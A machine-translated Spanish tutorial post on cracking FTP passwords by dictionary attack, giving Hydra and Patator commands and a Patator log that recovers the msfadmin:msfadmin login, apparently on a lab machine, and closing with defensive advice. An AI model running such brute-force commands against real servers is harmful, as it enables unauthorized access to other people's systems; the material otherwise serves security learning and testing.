¿Cómo descifrar contraseñas de FTP?

Posted on by Rudeus Greyrat

El propósito principal de un servidor FTP es permitir que los usuarios carguen y descarguen archivos. Un servidor FTP es una computadora que tiene una dirección de protocolo de transferencia de archivos (FTP) y está dedicada a recibir una conexión FTP. FTP es un protocolo utilizado para transferir archivos a través de Internet entre un servidor (remitente) y un cliente (receptor). Un servidor FTP es una computadora que ofrece archivos disponibles para descargar a través de un protocolo FTP, y es una solución común utilizada para facilitar el intercambio remoto de datos entre computadoras.

FTP passwords cracking scenario

 

Método 1: Grieta usando Hydra

Hydra es a menudo la herramienta preferida. Puede realizar ataques de diccionario rápidos contra más de 50 protocolos, incluidos telnet, FTP, HTTP, HTTPS, SMB, varias bases de datos y mucho más.

Paso 1 : cree una lista de palabras, una lista de dos palabras para descifrar el nombre de usuario y la contraseña.

Paso 2 : Ejecute el siguiente comando:

 hydra -L user.txt -P pass.txt [target ip] FTP

 Here, -L: denotes path for username list
      -P:  denotes path for the password list

Una vez que se ejecutan los comandos, comenzará a aplicar el ataque de diccionario y, por lo tanto, tendrá el nombre de usuario y la contraseña correctos en muy poco tiempo. Como puede observar, obtuvimos con éxito el nombre de usuario de FTP como msfadmin y la contraseña es msfadmin.

Cracking Using Hydra

 

Paso 3: Ejecute el siguiente comando:

hydra -h

 

Método dos: Crack usando Patator

Patator es un fuerza bruta polivalente. Es bastante útil para realizar ataques de fuerza bruta en muchos puertos como FTP, HTTP, SMB, etc.

Paso 1: Ejecute este comando:

patator FTP_login host=192.168.29.77 
user=FILE0 0=user.txt password=FILE1 1=pass.txt
Cracking Using Patator

 

Note:     FTP_login: denotes the FTP brute forcing
          host= : for target ip/FTP server ip
          user=FILE 0= path of wordlist for cracking username
          password=FILE1 1= path of wordlist for cracking password

Producción:

┌──(kali㉿DESKTOP-SK08UEQ)-
[/mnt/c/Users/RAJ/Desktop/javascript]

└─$ patator FTP_login host=192.168.29.77 
user=FILE0 0=user.txt password=FILE1 1=pass.txt

23:46:17 patator    INFO - Starting Patator 0.9 
(https://github.com/lanjelot/patator) 
with python-3.9.10 at 2022-07-08 23:46 IST

23:46:17 patator    INFO -
23:46:17 patator    INFO - code  size    time | candidate           
|   num | mesg
23:46:17 patator    INFO - ----------------------------------
23:46:20 patator    INFO - 530   16     3.058 | bjgjhg:bjgjhg                      
|     6 | Login incorrect.
23:46:20 patator    INFO - 230   17     0.004 | msfadmin:msfadmin                 
|    16 | Login successful.
23:46:20 patator    INFO - 530   16     3.056 | bjgjhg:fhjfh                       
|     7 | Login incorrect.
23:46:20 patator    INFO - 530   16     3.052 | bjgjhg:msfadmin                    
|     8 | Login incorrect.
23:46:20 patator    INFO - 530   16     3.052 | fhjfh:fdgd                         
|     9 | Login incorrect.
23:46:20 patator    INFO - 530   16     3.049 | fhjfh:bjgjhg                       
|    10 | Login incorrect.
23:46:21 patator    INFO - 530   16     2.853 | fdgd:fdgd                          
|     1 | Login incorrect.
23:46:21 patator    INFO - 530   16     2.850 | fdgd:bjgjhg                        
|     2 | Login incorrect.
23:46:21 patator    INFO - 530   16     2.858 | fdgd:fhjfh                         
|     3 | Login incorrect.
23:46:21 patator    INFO - 530   16     2.857 | fdgd:msfadmin                      
|     4 | Login incorrect.
23:46:21 patator    INFO - 530   16     2.863 | bjgjhg:fdgd                        
|     5 | Login incorrect.
23:46:24 patator    INFO - 530   16     2.928 | fhjfh:fhjfh                       
|    11 | Login incorrect.
23:46:24 patator    INFO - 530   16     2.929 | fhjfh:msfadmin                     
|    12 | Login incorrect.
23:46:24 patator    INFO - 530   16     2.935 | msfadmin:fdgd                      
|    13 | Login incorrect.
23:46:24 patator    INFO - 530   16     2.935 | msfadmin:bjgjhg                    
|    14 | Login incorrect.
23:46:24 patator    INFO - 530   16     2.925 | msfadmin:fhjfh                     
|    15 | Login incorrect.
23:46:24 patator    INFO - Hits/Done/Skip/Fail/Size:
 16/16/0/0/9, Avg: 2 r/s, Time: 0h 0m 7s
Note: Here is username msfadmin 
and password msfadmin is Login successfully

Conclusión:

Cualquier intento de pirateo de contraseñas tiene éxito solo debido a las combinaciones de contraseñas predecibles. Los cortafuegos e IPS son excelentes para aumentar la protección de sus activos en la red, pero no olvide prácticas como capacitar a los empleados contra la ingeniería social, usar autenticación multifactor, cambios de contraseña mensuales y auditorías de contraseña aleatorias en todos los sistemas para garantizar que no se usen contraseñas débiles.

Publicación traducida automáticamente

Artículo escrito por rajnandi5045 y traducido por Barcelona Geeks. The original can be accessed here. Licence: CCBY-SA

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *